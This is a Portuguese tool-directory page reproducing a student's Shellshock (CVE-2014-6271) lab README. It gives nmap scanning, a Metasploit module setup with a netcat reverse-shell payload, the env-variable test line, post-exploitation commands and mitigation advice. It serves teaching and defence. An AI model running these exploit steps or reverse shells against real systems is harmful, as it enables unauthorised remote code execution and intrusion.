Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Shellshock-CVE-2014-6271-Exploitation-and-Analysis — # Laboratório educacional demonstrando a exploração do Shellshock (CVE-2014-6271) usando Metasploit contra o Metasploitable 2, incluindo varredura, exploração, reverse shell e estratégias de mitigação. | Kitploit
Ferramentas/GitHubGitHub/rajmadhusankha/shellshock-cve-2014-6271-exploitation-and-analysis
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoLabs e Prática
GitHubrajmadhusankha/shellshock-cve-2014-6271-exploitation-and-analysis

Shellshock-CVE-2014-6271-Exploitation-and-Analysis

# Laboratório educacional demonstrando a exploração do Shellshock (CVE-2014-6271) usando Metasploit contra o Metasploitable 2, incluindo varredura, exploração, reverse shell e estratégias de mitigação.

Ver Repositório
1há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🐚 Shellshock (CVE-2014-6271) – Exploração e Análise

📌 Visão Geral

Este é o trabalho prático da disciplina Avaliação de Vulnerabilidades e Testes de Penetração – II, focado na exploração e análise da vulnerabilidade Shellshock (CVE-2014-6271).
Realizado em um ambiente de laboratório controlado usando Metasploitable 2 (alvo) e Kali Linux (atacante).


🛠 Ferramentas Utilizadas

  • 💻 Kali Linux – Máquina atacante
  • 🖥 Metasploitable 2 – Alvo vulnerável
  • 🔍 Nmap – Varredura e detecção de serviços
  • 🎯 Metasploit Framework – Exploração

🔍 Resumo da Vulnerabilidade

  • Tipo: Execução Remota de Código (RCE)
  • Componente Afetado: GNU Bash (versões 1.14–4.3)
  • Impacto: Executar comandos arbitrários por meio de variáveis de ambiente especialmente criadas
  • Pontuação CVSS: 10.0 (Crítico)
  • Vetor de Exploração: Frequentemente por meio de cabeçalhos HTTP para scripts CGI

⚡ Etapas do Laboratório

1️⃣ Varredura do Alvo

root@kitploit:~
 nmap -sS -sV <target-ip>

2️⃣ Iniciar Metasploit msfconsole

3️⃣ Carregar Módulo de Exploit use exploit/multi/http/apache_mod_cgi_bash_env_exec

4️⃣ Configurar Exploit

root@kitploit:~
set RHOST <target-ip>
set TARGETURI /cgi-bin/status
set LHOST <your-kali-ip>
set PAYLOAD cmd/unix/reverse_netcat

5️⃣ Executar Exploit exploit

📸 Demonstração Inclui

root@kitploit:~
📡 Resultados da varredura Nmap
⚙️ Configuração do Metasploit
🔄 Saída da sessão de reverse shell
🛠 Comandos de pós-exploração:
whoami
uname -a
ifconfig

📖 Fundamentação Teórica

O que é Shellshock?

Shellshock é uma vulnerabilidade no shell GNU Bash que permite que atacantes executem comandos arbitrários injetando-os em variáveis de ambiente. Descoberta em setembro de 2014 e atribuída a CVE-2014-6271, afeta Bash v1.14 a v4.3.

Como Funciona

O Bash processa incorretamente definições de funções em variáveis de ambiente e executa comandos extras após o corpo da função. Em servidores web que utilizam scripts CGI, os cabeçalhos HTTP tornam-se variáveis de ambiente, criando um caminho fácil para ataque.

Exemplo:

env x='() { :;}; echo vulnerable' bash -c "echo test"

Se vulnerável, imprime vulnerable.

Impacto

root@kitploit:~
Execução Remota de Código (RCE) completa sem autenticação
Explorável por meio de simples requisições HTTP
Usado em botnets, worms, ataques direcionados
Afetou milhões de servidores, roteadores e dispositivos IoT

Explorações do Mundo Real

root@kitploit:~
Servidores Yahoo – Malware via scripts CGI
Botnet Wopbot – Exploração automatizada
QNAP NAS – Acesso remoto a shell e malware
Worms Auto-replicantes – Propagação para novos hosts vulneráveis

🛡 Prevenção e Mitigação

root@kitploit:~
🔄 Atualizar o Bash imediatamente
🚫 Desabilitar scripts CGI não utilizados
🔥 Usar firewalls para bloquear tráfego desnecessário
🛡 Implantar Firewalls de Aplicação Web (WAF)
📜 Monitorar logs de requisições HTTP
👤 Aplicar princípios de Menor Privilégio

⚠️ Aviso Legal

Este projeto é apenas para fins educacionais. Todos os testes foram realizados em ambiente de laboratório controlado. ❌ NÃO utilize essas técnicas em sistemas sem permissão.


👨‍💻 Autor: Janith Madhusankha

🎓 Curso: BICT (Hons) em Redes e Segurança 🏫 Instituição: South Eastern University of Sri Lanka

Baixar ferramenta